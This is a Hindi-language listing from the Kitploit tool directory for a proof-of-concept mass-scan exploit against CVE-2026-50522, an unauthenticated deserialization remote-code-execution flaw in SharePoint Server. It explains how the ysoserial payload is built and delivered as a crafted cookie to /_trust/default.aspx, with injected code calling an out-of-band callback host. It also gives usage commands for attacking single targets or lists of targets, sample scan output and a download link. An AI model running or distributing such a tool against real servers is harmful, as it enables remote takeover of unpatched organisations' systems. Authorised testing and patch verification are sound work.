Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/4minx/cve-2026-50522
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub4minx/cve-2026-50522

CVE-2026-50522

CVE-2026-50522 PoC

रिपॉजिटरी देखें
3817225 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-50522 Poc : SharePoint Deserialization RCE

SharePoint Server पर SecurityContextToken कुकी डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन

CVE-2026-50522 के लिए मास-स्कैन एक्सप्लॉइट जो ऑन-प्रिमाइसेस Microsoft SharePoint Server को लक्षित करता है। यह /_trust/default.aspx WS-Federation एंडपॉइंट में असुरक्षित BinaryFormatter डिसीरियलाइज़ेशन का दुरुपयोग करके क्राफ्टेड SecurityContextToken कुकीज़ के माध्यम से बिना प्रमाणीकरण के कोड निष्पादन प्राप्त करता है।

नोट: इस प्रोजेक्ट में ysoserial शामिल है, जो एक जाना-माना पेनिट्रेशन-परीक्षण उपकरण है, इसलिए डाउनलोड के दौरान आपका एंटीवायरस इसे फ़्लैग या क्वारंटीन कर सकता है।


भेद्यता जानकारी

  • CVE: CVE-2026-50522
  • प्रकार: CWE-502 अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
  • CVSS 3.1: 9.8 (गंभीर)
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभावित:
    • Microsoft SharePoint Server Subscription Edition (16.0.19725.20434 से पहले)
    • Microsoft SharePoint Server 2019 (16.0.10417.20175 से पहले)
    • Microsoft SharePoint Enterprise Server 2016 (16.0.5561.1001 से पहले)

यह कैसे काम करता है

  1. ysoserial.exe TypeConfuseDelegate गैजेट का उपयोग करके BinaryFormatter सीरियलाइज़्ड पेलोड उत्पन्न करता है
  2. पेलोड एक आउट-ऑफ-बैंड कॉलबैक URL पर Invoke-WebRequest निष्पादित करता है
  3. कच्चे बाइट्स को डिफ्लेट (zlib) किया जाता है और Base64-एन्कोडेड करके एक कुकी मान में बदल दिया जाता है
  4. कुकी को SecurityContextToken XML संरचना के अंदर लपेटा जाता है
  5. टोकन को RequestSecurityTokenResponse (WS-Federation) में एम्बेड किया जाता है
  6. wresult पैरामीटर /_trust/default.aspx पर POST किया जाता है
  7. SharePoint टोकन को डिसीरियलाइज़ करता है, जिससे IIS वर्कर प्रोसेस में कोड निष्पादन ट्रिगर होता है

आवश्यकताएँ

  • Python 3.10+ requests लाइब्रेरी के साथ
  • ysoserial.net (डाउनलोड)
  • OOB कॉलबैक सर्वर (Burp Collaborator, interactsh, OAST)

उपयोग

एकल लक्ष्य

root@kitploit:~
python CVE-2026-50522.py -t http://10.10.10.5 -c http://YOUR_ID.oastify.com

मास स्कैन

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com

कस्टम ysoserial पथ

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --ysoserial C:\tools\ysoserial.exe

प्रॉक्सी के साथ

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com -x http://127.0.0.1:8080

सबडोमेन कॉलबैक मोड

root@kitploit:~
python CVE-2026-50522.py -T targets.txt -c http://YOUR_ID.oastify.com --callback-mode subdomain

विकल्प

तर्कविवरणडिफ़ॉल्ट
-t, --targetएकल लक्ष्य URL-
-T, --targetsलक्ष्य URL वाली फ़ाइल, प्रति पंक्ति एक-
-c, --callback-urlOOB कॉलबैक बेस URL (आवश्यक)-
--callback-modepath या subdomainpath
--ysoserialysoserial.exe का पथysoserial.exe
-x, --proxyHTTP प्रॉक्सीकोई नहीं

कॉलबैक मोड

पथ मोड (डिफ़ॉल्ट):

root@kitploit:~
http://YOUR_ID.oastify.com/10.10.10.5

सबडोमेन मोड:

root@kitploit:~
http://10.10.10.5.YOUR_ID.oastify.com

उदाहरण आउटपुट

root@kitploit:~
[*] 50 target(s) | callback: http://abc123.oastify.com (path) | ysoserial: ysoserial.exe
[10.10.10.5] [+] 200 [LOGIN_PAGE,AUTH_COOKIE]
[10.10.10.6] [!] 200 [AMSI_BLOCKED]
[10.10.10.7] [!] TIMEOUT
[10.10.10.8] [!] SSL_ERR
[10.10.10.9] [!] 403 [HTTP_403]

[*] 45.2s | 50 total | 12 potential | 3 amsi | 5 failed

संदर्भ

  • Microsoft - CVE-2026-50522
  • SOCRadar - CVE-2026-50522 PoC SharePoint हमलों को बढ़ावा देता है
  • thehackernews - गंभीर SharePoint RCE CVE-2026-50522 सार्वजनिक PoC के बाद सक्रिय रूप से शोषित
टूल डाउनलोड करें